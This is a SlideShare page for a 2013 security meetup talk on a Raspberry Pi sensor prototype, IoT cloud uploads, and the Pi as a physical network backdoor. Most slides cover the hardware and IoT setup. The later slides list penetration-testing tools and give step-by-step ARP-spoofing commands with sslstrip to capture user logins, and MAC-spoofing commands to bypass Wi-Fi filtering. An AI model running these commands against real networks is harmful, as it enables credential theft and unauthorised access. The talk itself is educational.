The LabRat
Physical Backdoor Hacks
and
Internet of Things (IOT) Primer
Akshat Sharma,
TME, Cisco Systems.
The Raspberry Pi
http://www.raspberrypi.org/downloads
Image Downloads and Updates
http://elinux.org/RPi_Low-level_peripher...
Raspberry Pi as a Physical Backdoor
into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-ph...
Humidity
Sensor
CH0
CH3
CLK
CS (AL)
MOSI
MISO
IR
LED -
Receiver
IR
LED -
Receiver
Optical
Fiber
CH1 CH2
Binary
Signal In
B...
The LabRat- a Proof of Concept
Prototype
The Raspberry Pi – a 35$ Linux Computer that
powers the LabRat prototype.
To get ...
The LabRat Prototype
Current Setup
10 inch
Capacitive
Touchscreen
Optical Fiber
Tester
Humidity
Sensor Temperature
Sensor
...
The LabRat Prototype
LM 35 + ADS7841 Temperature Sensor
LM 35
Temperature
SensorADS7841
Analog to
Digital
Converter
The LabRat Prototype
Humidity Sensor SMD + ADS7841
ADS7841
Analog to
Digital
Converter
Humidity
Sensor
SMD
The LabRat Prototype
Optical Fiber Tester
Optical
Fiber
Holders
Infra-red
LED-Receiver
Combination
to transmit
Messages vi...
Connecting to an IOT Cloud
⁻ https://xively.com/
⁻ Formerly Cosm, Pachube
Set up a Cosm (Now Xively) Account
• Register on cosm (xively) and Add Device
• You will Receive an API Key and FEED ID
• ...
Setting up the Python Script to send
Data to Xively
Install EEML package from github
sudo apt-get install python-dev
sudo ...
The LabRat Prototype
Online Real-Time Feed –
Temperature and Humidity
Visit the Real-Time Feed at https://cosm.com/feeds/8...
The LabRat Prototype
Python Scripts
1) Python Script to upload the Temperature and Humidity Data to an online Cloud
based ...
The LabRat Prototype
Current List of Penetration-Testing Tools
Information Gathering
-------------------
wireshark
tcpflow...
DEMO
- Arp Spoofing using SSLstrip and arpspoof
- Mac Spoofing using Airmon-ng and
macchanger
- Packet Sniffing using Wire...
Arp Spoofing and Mac-Spoofing
Attacks
Arp Spoofing
• Set up Port Forwarding
iptables -t nat -A PREROUTING -p tcp --destina...
Putting The Internet of Things into Perspective
Co-incidental Cisco Plugin :p
Thank You
Upcoming SlideShare
Loading in …5
×

The LabRat - Physical backdoor hacks and IOT primer

2,013 views

Published on

null Bangalore Chapter - July 2013 Meet

Published in: Education, Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,013
On SlideShare
0
From Embeds
0
Number of Embeds
338
Actions
Shares
0
Downloads
17
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

The LabRat - Physical backdoor hacks and IOT primer

  1. 1. The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.
  2. 2. The Raspberry Pi http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens. Google’s your Best Friend
  3. 3. Raspberry Pi as a Physical Backdoor into your network http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello Rogue APs Mac Spoofing on wired Networks MITM attacks
  4. 4. Humidity Sensor CH0 CH3 CLK CS (AL) MOSI MISO IR LED - Receiver IR LED - Receiver Optical Fiber CH1 CH2 Binary Signal In Binary Signal In The LabRat Circuit Temperature Sensor Humidity Sensor Optical Fiber Tester
  5. 5. The LabRat- a Proof of Concept Prototype The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype. To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
  6. 6. The LabRat Prototype Current Setup 10 inch Capacitive Touchscreen Optical Fiber Tester Humidity Sensor Temperature Sensor Raspberry-Pi HDMi-to-LVDS converter board 10,000 mAH Lithium Polymer Battery
  7. 7. The LabRat Prototype LM 35 + ADS7841 Temperature Sensor LM 35 Temperature SensorADS7841 Analog to Digital Converter
  8. 8. The LabRat Prototype Humidity Sensor SMD + ADS7841 ADS7841 Analog to Digital Converter Humidity Sensor SMD
  9. 9. The LabRat Prototype Optical Fiber Tester Optical Fiber Holders Infra-red LED-Receiver Combination to transmit Messages via the Fiber
  10. 10. Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube
  11. 11. Set up a Cosm (Now Xively) Account • Register on cosm (xively) and Add Device • You will Receive an API Key and FEED ID • Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
  12. 12. Setting up the Python Script to send Data to Xively Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python- eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install Set up Python Script # source eeml package import eeml <snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
  13. 13. The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
  14. 14. The LabRat Prototype Python Scripts 1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics. 2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
  15. 15. The LabRat Prototype Current List of Penetration-Testing Tools Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
  16. 16. DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and macchanger - Packet Sniffing using Wireshark - Other MITM attacks
  17. 17. Arp Spoofing and Mac-Spoofing Attacks Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward • Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address> • Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080 Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed devices> wlan0 • Ifconfig wlan0 up
  18. 18. Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
  19. 19. Thank You

×